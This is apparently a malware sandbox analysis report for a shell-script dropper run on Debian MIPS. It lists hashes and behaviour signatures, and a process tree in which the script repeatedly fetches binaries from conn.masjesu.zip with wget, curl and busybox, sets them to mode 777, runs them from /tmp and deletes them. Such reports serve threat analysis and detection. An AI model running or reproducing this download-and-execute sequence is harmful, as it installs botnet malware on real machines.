Analysis
-
max time kernel
96s -
max time network
99s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
24/11/2024, 02:03
Static task
static1
Behavioral task
behavioral1
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
-
Size
10KB
-
MD5
b3326e86c6435c58119faa00fd7de1c3
-
SHA1
706ae71f350916adfb672b819c6cca8e1ab5fdc5
-
SHA256
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9
-
SHA512
e6eeba93a0d3074d2942fa787cb23d5458e0ead7df8bf5597fd29134ad3ebe1b1e194f62c0117c29e98527b067eea7ae78a44ac9fc7302ef04b873e7585362aa
-
SSDEEP
192:o2tYFkg5W+fWyW5cE9JxKDXgGyW5cEHJxKDXsWkg5W+l:o2tYLo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh1⤵PID:695
-
/bin/rm/bin/rm bins.sh2⤵PID:697
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:703
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:724
-
-
/bin/chmodchmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:728
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:729
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:735
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:768
-
-
/bin/chmodchmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:779
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:780
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:802
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:831
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:866
-
-
/bin/chmodchmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:887
-
-
/bin/chmodchmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:908
-
-
/bin/chmodchmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- System Network Configuration Discovery
PID:915
-
-
/bin/chmodchmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:943
-
-
/bin/chmodchmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:959
-
-
/bin/rmrm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:971
-
-
/bin/chmodchmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:992
-
-
